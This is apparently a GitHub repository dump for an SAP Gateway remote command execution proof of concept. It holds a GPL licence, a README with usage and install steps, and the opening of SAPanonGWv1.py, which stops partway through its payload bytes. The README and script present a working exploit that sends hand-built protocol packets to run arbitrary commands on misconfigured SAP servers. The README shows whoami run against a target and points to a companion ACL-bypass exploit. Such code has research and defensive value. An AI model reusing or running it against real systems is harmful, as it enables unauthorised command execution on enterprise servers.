├── COPYING ├── README.md ├── SAPanonGWv1.py ├── SAPanonGWv2.py └── requirements.txt /COPYING: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc. 5 | 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | Preamble 10 | 11 | The licenses for most software are designed to take away your 12 | freedom to share and change it. By contrast, the GNU General Public 13 | License is intended to guarantee your freedom to share and change free 14 | software--to make sure the software is free for all its users. This 15 | General Public License applies to most of the Free Software 16 | Foundation's software and to any other program whose authors commit to 17 | using it. (Some other Free Software Foundation software is covered by 18 | the GNU Library General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not 22 | price. Our General Public Licenses are designed to make sure that you 23 | have the freedom to distribute copies of free software (and charge for 24 | this service if you wish), that you receive source code or can get it 25 | if you want it, that you can change the software or use pieces of it 26 | in new free programs; and that you know you can do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid 29 | anyone to deny you these rights or to ask you to surrender the rights. 30 | These restrictions translate to certain responsibilities for you if you 31 | distribute copies of the software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether 34 | gratis or for a fee, you must give the recipients all the rights that 35 | you have. You must make sure that they, too, receive or can get the 36 | source code. And you must show them these terms so they know their 37 | rights. 38 | 39 | We protect your rights with two steps: (1) copyright the software, and 40 | (2) offer you this license which gives you legal permission to copy, 41 | distribute and/or modify the software. 42 | 43 | Also, for each author's protection and ours, we want to make certain 44 | that everyone understands that there is no warranty for this free 45 | software. If the software is modified by someone else and passed on, we 46 | want its recipients to know that what they have is not the original, so 47 | that any problems introduced by others will not reflect on the original 48 | authors' reputations. 49 | 50 | Finally, any free program is threatened constantly by software 51 | patents. We wish to avoid the danger that redistributors of a free 52 | program will individually obtain patent licenses, in effect making the 53 | program proprietary. To prevent this, we have made it clear that any 54 | patent must be licensed for everyone's free use or not licensed at all. 55 | 56 | The precise terms and conditions for copying, distribution and 57 | modification follow. 58 | 59 | GNU GENERAL PUBLIC LICENSE 60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 61 | 62 | 0. This License applies to any program or other work which contains 63 | a notice placed by the copyright holder saying it may be distributed 64 | under the terms of this General Public License. The "Program", below, 65 | refers to any such program or work, and a "work based on the Program" 66 | means either the Program or any derivative work under copyright law: 67 | that is to say, a work containing the Program or a portion of it, 68 | either verbatim or with modifications and/or translated into another 69 | language. (Hereinafter, translation is included without limitation in 70 | the term "modification".) Each licensee is addressed as "you". 71 | 72 | Activities other than copying, distribution and modification are not 73 | covered by this License; they are outside its scope. The act of 74 | running the Program is not restricted, and the output from the Program 75 | is covered only if its contents constitute a work based on the 76 | Program (independent of having been made by running the Program). 77 | Whether that is true depends on what the Program does. 78 | 79 | 1. You may copy and distribute verbatim copies of the Program's 80 | source code as you receive it, in any medium, provided that you 81 | conspicuously and appropriately publish on each copy an appropriate 82 | copyright notice and disclaimer of warranty; keep intact all the 83 | notices that refer to this License and to the absence of any warranty; 84 | and give any other recipients of the Program a copy of this License 85 | along with the Program. 86 | 87 | You may charge a fee for the physical act of transferring a copy, and 88 | you may at your option offer warranty protection in exchange for a fee. 89 | 90 | 2. You may modify your copy or copies of the Program or any portion 91 | of it, thus forming a work based on the Program, and copy and 92 | distribute such modifications or work under the terms of Section 1 93 | above, provided that you also meet all of these conditions: 94 | 95 | a) You must cause the modified files to carry prominent notices 96 | stating that you changed the files and the date of any change. 97 | 98 | b) You must cause any work that you distribute or publish, that in 99 | whole or in part contains or is derived from the Program or any 100 | part thereof, to be licensed as a whole at no charge to all third 101 | parties under the terms of this License. 102 | 103 | c) If the modified program normally reads commands interactively 104 | when run, you must cause it, when started running for such 105 | interactive use in the most ordinary way, to print or display an 106 | announcement including an appropriate copyright notice and a 107 | notice that there is no warranty (or else, saying that you provide 108 | a warranty) and that users may redistribute the program under 109 | these conditions, and telling the user how to view a copy of this 110 | License. (Exception: if the Program itself is interactive but 111 | does not normally print such an announcement, your work based on 112 | the Program is not required to print an announcement.) 113 | 114 | These requirements apply to the modified work as a whole. If 115 | identifiable sections of that work are not derived from the Program, 116 | and can be reasonably considered independent and separate works in 117 | themselves, then this License, and its terms, do not apply to those 118 | sections when you distribute them as separate works. But when you 119 | distribute the same sections as part of a whole which is a work based 120 | on the Program, the distribution of the whole must be on the terms of 121 | this License, whose permissions for other licensees extend to the 122 | entire whole, and thus to each and every part regardless of who wrote it. 123 | 124 | Thus, it is not the intent of this section to claim rights or contest 125 | your rights to work written entirely by you; rather, the intent is to 126 | exercise the right to control the distribution of derivative or 127 | collective works based on the Program. 128 | 129 | In addition, mere aggregation of another work not based on the Program 130 | with the Program (or with a work based on the Program) on a volume of 131 | a storage or distribution medium does not bring the other work under 132 | the scope of this License. 133 | 134 | 3. You may copy and distribute the Program (or a work based on it, 135 | under Section 2) in object code or executable form under the terms of 136 | Sections 1 and 2 above provided that you also do one of the following: 137 | 138 | a) Accompany it with the complete corresponding machine-readable 139 | source code, which must be distributed under the terms of Sections 140 | 1 and 2 above on a medium customarily used for software interchange; or, 141 | 142 | b) Accompany it with a written offer, valid for at least three 143 | years, to give any third party, for a charge no more than your 144 | cost of physically performing source distribution, a complete 145 | machine-readable copy of the corresponding source code, to be 146 | distributed under the terms of Sections 1 and 2 above on a medium 147 | customarily used for software interchange; or, 148 | 149 | c) Accompany it with the information you received as to the offer 150 | to distribute corresponding source code. (This alternative is 151 | allowed only for noncommercial distribution and only if you 152 | received the program in object code or executable form with such 153 | an offer, in accord with Subsection b above.) 154 | 155 | The source code for a work means the preferred form of the work for 156 | making modifications to it. For an executable work, complete source 157 | code means all the source code for all modules it contains, plus any 158 | associated interface definition files, plus the scripts used to 159 | control compilation and installation of the executable. However, as a 160 | special exception, the source code distributed need not include 161 | anything that is normally distributed (in either source or binary 162 | form) with the major components (compiler, kernel, and so on) of the 163 | operating system on which the executable runs, unless that component 164 | itself accompanies the executable. 165 | 166 | If distribution of executable or object code is made by offering 167 | access to copy from a designated place, then offering equivalent 168 | access to copy the source code from the same place counts as 169 | distribution of the source code, even though third parties are not 170 | compelled to copy the source along with the object code. 171 | 172 | 4. You may not copy, modify, sublicense, or distribute the Program 173 | except as expressly provided under this License. Any attempt 174 | otherwise to copy, modify, sublicense or distribute the Program is 175 | void, and will automatically terminate your rights under this License. 176 | However, parties who have received copies, or rights, from you under 177 | this License will not have their licenses terminated so long as such 178 | parties remain in full compliance. 179 | 180 | 5. You are not required to accept this License, since you have not 181 | signed it. However, nothing else grants you permission to modify or 182 | distribute the Program or its derivative works. These actions are 183 | prohibited by law if you do not accept this License. Therefore, by 184 | modifying or distributing the Program (or any work based on the 185 | Program), you indicate your acceptance of this License to do so, and 186 | all its terms and conditions for copying, distributing or modifying 187 | the Program or works based on it. 188 | 189 | 6. Each time you redistribute the Program (or any work based on the 190 | Program), the recipient automatically receives a license from the 191 | original licensor to copy, distribute or modify the Program subject to 192 | these terms and conditions. You may not impose any further 193 | restrictions on the recipients' exercise of the rights granted herein. 194 | You are not responsible for enforcing compliance by third parties to 195 | this License. 196 | 197 | 7. If, as a consequence of a court judgment or allegation of patent 198 | infringement or for any other reason (not limited to patent issues), 199 | conditions are imposed on you (whether by court order, agreement or 200 | otherwise) that contradict the conditions of this License, they do not 201 | excuse you from the conditions of this License. If you cannot 202 | distribute so as to satisfy simultaneously your obligations under this 203 | License and any other pertinent obligations, then as a consequence you 204 | may not distribute the Program at all. For example, if a patent 205 | license would not permit royalty-free redistribution of the Program by 206 | all those who receive copies directly or indirectly through you, then 207 | the only way you could satisfy both it and this License would be to 208 | refrain entirely from distribution of the Program. 209 | 210 | If any portion of this section is held invalid or unenforceable under 211 | any particular circumstance, the balance of the section is intended to 212 | apply and the section as a whole is intended to apply in other 213 | circumstances. 214 | 215 | It is not the purpose of this section to induce you to infringe any 216 | patents or other property right claims or to contest validity of any 217 | such claims; this section has the sole purpose of protecting the 218 | integrity of the free software distribution system, which is 219 | implemented by public license practices. Many people have made 220 | generous contributions to the wide range of software distributed 221 | through that system in reliance on consistent application of that 222 | system; it is up to the author/donor to decide if he or she is willing 223 | to distribute software through any other system and a licensee cannot 224 | impose that choice. 225 | 226 | This section is intended to make thoroughly clear what is believed to 227 | be a consequence of the rest of this License. 228 | 229 | 8. If the distribution and/or use of the Program is restricted in 230 | certain countries either by patents or by copyrighted interfaces, the 231 | original copyright holder who places the Program under this License 232 | may add an explicit geographical distribution limitation excluding 233 | those countries, so that distribution is permitted only in or among 234 | countries not thus excluded. In such case, this License incorporates 235 | the limitation as if written in the body of this License. 236 | 237 | 9. The Free Software Foundation may publish revised and/or new versions 238 | of the General Public License from time to time. Such new versions will 239 | be similar in spirit to the present version, but may differ in detail to 240 | address new problems or concerns. 241 | 242 | Each version is given a distinguishing version number. If the Program 243 | specifies a version number of this License which applies to it and "any 244 | later version", you have the option of following the terms and conditions 245 | either of that version or of any later version published by the Free 246 | Software Foundation. If the Program does not specify a version number of 247 | this License, you may choose any version ever published by the Free Software 248 | Foundation. 249 | 250 | 10. If you wish to incorporate parts of the Program into other free 251 | programs whose distribution conditions are different, write to the author 252 | to ask for permission. For software which is copyrighted by the Free 253 | Software Foundation, write to the Free Software Foundation; we sometimes 254 | make exceptions for this. Our decision will be guided by the two goals 255 | of preserving the free status of all derivatives of our free software and 256 | of promoting the sharing and reuse of software generally. 257 | 258 | NO WARRANTY 259 | 260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN 262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 268 | REPAIR OR CORRECTION. 269 | 270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 278 | POSSIBILITY OF SUCH DAMAGES. 279 | 280 | END OF TERMS AND CONDITIONS 281 | 282 | How to Apply These Terms to Your New Programs 283 | 284 | If you develop a new program, and you want it to be of the greatest 285 | possible use to the public, the best way to achieve this is to make it 286 | free software which everyone can redistribute and change under these terms. 287 | 288 | To do so, attach the following notices to the program. It is safest 289 | to attach them to the start of each source file to most effectively 290 | convey the exclusion of warranty; and each file should have at least 291 | the "copyright" line and a pointer to where the full notice is found. 292 | 293 | 294 | Copyright (C) 295 | 296 | This program is free software; you can redistribute it and/or modify 297 | it under the terms of the GNU General Public License as published by 298 | the Free Software Foundation; either version 2 of the License, or 299 | (at your option) any later version. 300 | 301 | This program is distributed in the hope that it will be useful, 302 | but WITHOUT ANY WARRANTY; without even the implied warranty of 303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 304 | GNU General Public License for more details. 305 | 306 | You should have received a copy of the GNU General Public License 307 | along with this program; if not, write to the Free Software 308 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 309 | 310 | 311 | Also add information on how to contact you by electronic and paper mail. 312 | 313 | If the program is interactive, make it output a short notice like this 314 | when it starts in an interactive mode: 315 | 316 | Gnomovision version 69, Copyright (C) year name of author 317 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 318 | This is free software, and you are welcome to redistribute it 319 | under certain conditions; type `show c' for details. 320 | 321 | The hypothetical commands `show w' and `show c' should show the appropriate 322 | parts of the General Public License. Of course, the commands you use may 323 | be called something other than `show w' and `show c'; they could even be 324 | mouse-clicks or menu items--whatever suits your program. 325 | 326 | You should also get your employer (if you work as a programmer) or your 327 | school, if any, to sign a "copyright disclaimer" for the program, if 328 | necessary. Here is a sample; alter the names: 329 | 330 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 331 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 332 | 333 | , 1 April 1989 334 | Ty Coon, President of Vice 335 | 336 | This General Public License does not permit incorporating your program into 337 | proprietary programs. If your program is a subroutine library, you may 338 | consider it more useful to permit linking proprietary applications with the 339 | library. If this is what you want to do, use the GNU Library General 340 | Public License instead of this License. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## What is it? 2 | 3 | This PoC exploits an ACL misconfiguration in the SAP Gateway (port 4 | 33xx) that leads to a Remote Command Execution (RCE). 5 | 6 | `SAPanonGWv1.py` is the first version of the exploit based on raw 7 | packets sent. It does not require any additional modules (Run and 8 | Pwn!). 9 | 10 | `SAPanonGWv2.py` is the second version of the exploit based on the 11 | [pysap](https://github.com/SecureAuthCorp/pysap) library. 12 | 13 | ## Creds 14 | 15 | These PoCs were developed by Dmitry [@_chipik](https://twitter.com/_chipik) Chastuhin 16 | 17 | 18 | ## How to use 19 | 20 | ```bash 21 | ➜python SAPanonGWv1.py -t 172.16.30.28 -p 3300 -c whoami 22 | [*] sending cmd:whoami 23 | n45adm 24 | ``` 25 | 26 | 27 | ```bash 28 | ➜python SAPanonGWv2.py -t -p 3300 -c whoami 29 | [INFO ] [+] Sending GW_NORMAL_CLIENT 30 | [INFO ] Response: OK 31 | [INFO ] [+] Sending F_SAP_INIT 32 | [INFO ] Response: OK 33 | [INFO ] [+] Sending F_SAP_SEND 34 | [INFO ] [+] Sending F_SAP_SEND2 35 | n45adm 36 | ``` 37 | 38 | 39 | ## Installation 40 | 41 | Only for `SAPanonGWv2.p` 42 | 43 | ``` 44 | git clone https://github.com/gelim/pysap 45 | pip install -r pysap/requirements.txt 46 | python pysap/setup.py install 47 | git clone https://github.com/chipik/SAP_GW_RCE_exploit 48 | ``` 49 | 50 | or 51 | 52 | ``` 53 | git clone https://github.com/chipik/SAP_GW_RCE_exploit 54 | pip install -r SAP_GW_RCE_exploit/requirements.txt 55 | ``` 56 | 57 | 58 | ## SAP GW ACL bypass 59 | 60 | You can use these exploits together with [SAP MS Trusted](https://github.com/gelim/sap_ms) exploit that allows you to bypass dafault `sec_info` ACL 61 | 62 | See our [presentation ](https://github.com/comaeio/OPCDE/blob/master/2019/Emirates/(SAP)%20Gateway%20to%20Heaven%20-%20Dmitry%20Chastuhin%2C%20Mathieu%20Geli/(SAP)%20Gateway%20to%20Heaven.pdf) for details 63 | 64 | ### Contributors 65 | 66 | Contributions made by: 67 | 68 | * Dmitry Chastuhin ([@_chipik](https://twitter.com/_chipik)) 69 | * Mathieu Geli ([@gelim](https://github.com/gelim)) 70 | -------------------------------------------------------------------------------- /SAPanonGWv1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Dmitry @_chipik Chastuhin 4 | 5 | # tested on SAP 700 sp5 <= BASIS <= SAP 731 SP 04 6 | # exploit for SAP GW. Works when sec_info file doesn't exist and when gw/acl_mode = 0 7 | 8 | import argparse 9 | import socket 10 | import re 11 | 12 | 13 | def parse_args(): 14 | parser = argparse.ArgumentParser(description='[*] Hello, welcome to SAP GW exploit...') 15 | parser.add_argument('-t', '--target', required=True, help='Target IP address') 16 | parser.add_argument('-p', '--port', required=True, type=int, default='3300', 17 | help='Target GW port number.Default 3300') 18 | parser.add_argument('-c', '--cmd', help='Command name') 19 | parser.add_argument('-v', '--verb', action='store_true', default=0, help='Enable verbose') 20 | parser.add_argument('-o', '--old', action='store_true', help='Use when version of the GW ~640') 21 | args = parser.parse_args() 22 | return args 23 | 24 | 25 | # parse input 26 | args = parse_args() 27 | 28 | def convert_ip(ip_1, ch): 29 | for i in range((30 - len(ip_1) * 2) / 2): 30 | ip_1 = ip_1 + ch 31 | return ip_1 32 | 33 | 34 | def iptohex(ip): 35 | octets = ip.split('.') 36 | hex_octets = [] 37 | for octet in octets: 38 | if int(octet) < 16: 39 | hex_octets.append('0' + hex(int(octet))[2:]) 40 | else: 41 | hex_octets.append(hex(int(octet))[2:]) 42 | hex_octets = ''.join(hex_octets) 43 | return hex_octets.decode('hex') 44 | 45 | 46 | def net_get_ip(): 47 | return [(s.connect(('8.8.8.8', 53)), 48 | s.getsockname()[0], 49 | s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1] 50 | 51 | 52 | opt_ip = net_get_ip() 53 | 54 | # some optional ip in the first packet 55 | hex_ip = opt_ip 56 | # some optional ip in the second packet 57 | hex_ip2 = opt_ip 58 | targ2 = '10.10.10.10' 59 | targ2_size = chr(len(targ2)) 60 | targ1 = convert_ip(args.target, '\x00') 61 | 62 | exploit_p = [ 63 | "\x00\x00\x00\x40\x02\x03" + iptohex( 64 | hex_ip) + "\x00\x00\x00\x00\x73\x61\x70\x67\x77\x30\x31\x00\x00\x00\x34\x31\x30\x33\x00\x00\x00\x00\x00\x00\x73\x61\x70\x73\x65\x72\x76\x65\x73\x61\x70\x67\x77\x30\x31\x20\x20\x20\x20\x20\x20\x20\x20\x20\x06\x0b\xff\xff\x00\x00\x00\x00\x00\x00", 65 | "\x00\x00\x01\xA4\x06\xCA\x03\x00\x00\x13\xFF\xFF\x00\x00\x01\x00\x00\x00\x00\x00\xC0\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x01\x54\x00\x00\x87\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x5F\x37\x35\x20\x20\x20\x20\x31\x37\x32\x2E\x31\x36\x2E\x30\x73\x61\x70\x78\x70\x67\x20\x20\x45\x02\x00\x00\x00\x00\xFF\xFF\x60\x00\x00\x00\x00\x00\x00\x00\x00\x0E\x02\x00\x00\x00\x00\xE8\x4D\x23\x00\xDF\x07\x00\x00\x01\x00\x4E\xD5\x81\xE3\x09\xF6\xF1\x18\xA0\x0A\x00\x0C\x29\x00\x99\xD0\x00\x00\x00\x00\xFF\xFF\xFF\xFE\xFF\xFF\xFF\xFE\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + targ1 + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x53\x41\x50\x2A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x00\x00\x00\x00\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + iptohex( 66 | hex_ip2) + "\x00\x00\x00\x00\x73\x61\x70\x78\x70\x67\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 67 | "\x00\x00\x0A\x24\x06\xCB\x03\x00\x00\x13\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xF4\x00\x00\x00\x00\x00\x00\x08\x00\x00\x85\x0C\x00\x00\x00\x00\x00\x00\x00\x00\x39\x33\x32\x30\x31\x38\x37\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x01\x01\x00\x08\x01\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x03\x00\x04\x00\x00\x06\x1B\x01\x03\x01\x06\x00\x0B\x04\x01\x00\x03\x01\x03\x02\x00\x00\x00\x23\x01\x06\x00\x07\x00\x0F" + convert_ip( 68 | targ2, 69 | '\x20') + "\x00\x07\x00\x18\x00" + targ2_size + targ2 + "\x00\x18\x00\x08\x00\x11\x4E\x57\x37\x30\x33\x74\x72\x69\x61\x6C\x5F\x4E\x53\x50\x5F\x30\x30\x00\x08\x00\x11\x00\x01\x33\x00\x11\x00\x13\x00\x04\x37\x32\x30\x20\x00\x13\x00\x12\x00\x04\x37\x33\x31\x20\x00\x12\x00\x06\x00\x04\x54\x5F\x37\x35\x00\x06\x01\x30\x00\x08\x53\x41\x50\x4C\x53\x53\x58\x50\x01\x30\x01\x11\x00\x04\x53\x41\x50\x2A\x01\x11\x01\x14\x00\x03\x30\x30\x31\x01\x14\x01\x15\x00\x01\x45\x01\x15\x00\x09\x00\x04\x53\x41\x50\x2A\x00\x09\x01\x34\x00\x03\x30\x30\x31\x01\x34\x05\x01\x00\x01\x01\x05\x01\x01\x36\x00\x25\x01\x00\x0C\x29\x00\x99\xD0\x1E\xE3\xA0\xBA\x9A\xEC\xEA\x55\x80\x0A\x4E\xD5\x81\xE3\x09\xF6\xF1\x18\xA0\x0A\x00\x0C\x29\x00\x99\xD0\x00\x00\x00\x01\x01\x36\x05\x02\x00\x00\x05\x02\x00\x0B\x00\x03\x37\x33\x31\x00\x0B\x01\x02\x00\x15\x53\x41\x50\x58\x50\x47\x5F\x53\x54\x41\x52\x54\x5F\x58\x50\x47\x5F\x4C\x4F\x4E\x47\x01\x02\x05\x03\x00\x00\x05\x03\x01\x31\x00\xE6\x2A\x54\x48\x2A\x03\x00\xE6\x00\x00\x4E\x53\x50\x2F\x4E\x57\x37\x30\x33\x74\x72\x69\x61\x6C\x5F\x4E\x53\x50\x5F\x30\x30\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x00\x01\x53\x41\x50\x2A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x4D\x34\x39\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x00\x01\x4E\x53\x50\x2F\x4E\x57\x37\x30\x33\x74\x72\x69\x61\x6C\x5F\x4E\x53\x50\x5F\x30\x30\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x33\x37\x44\x35\x38\x31\x45\x33\x38\x38\x39\x41\x46\x31\x36\x44\x41\x30\x30\x41\x30\x30\x30\x43\x32\x39\x30\x30\x39\x39\x44\x30\x30\x30\x31\x00\x01\x00\x0C\x29\x00\x99\xD0\x1E\xE3\xA0\xBA\x9A\xEC\xEA\x55\x80\x0A\x4E\xD5\x81\xE3\x09\xF6\xF1\x18\xA0\x0A\x00\x0C\x29\x00\x99\xD0\x00\x00\x00\x01\x00\x00\x00\xE2\x2A\x54\x48\x2A\x01\x31\x05\x14\x00\x10\xE3\x81\xD5\x4E\xF6\x09\x19\xF1\xA0\x0A\x00\x0C\x29\x00\x99\xD0\x05\x14\x04\x20\x00\x04\x00\x00\x00\x00\x04\x20\x05\x12\x00\x00\x05\x12\x02\x05\x00\x06\x43\x4F\x4E\x56\x49\x44\x02\x05\x02\x05\x00\x08\x53\x54\x52\x54\x53\x54\x41\x54\x02\x05\x02\x05\x00\x05\x58\x50\x47\x49\x44\x02\x05\x02\x01\x00\x07\x45\x58\x54\x50\x52\x4F\x47\x02\x01\x02\x03\x00\x80\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x02\x03\x02\x01\x00\x0B\x4C\x4F\x4E\x47\x5F\x50\x41\x52\x41\x4D\x53\x02\x01\x02\x03\x04\x00\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2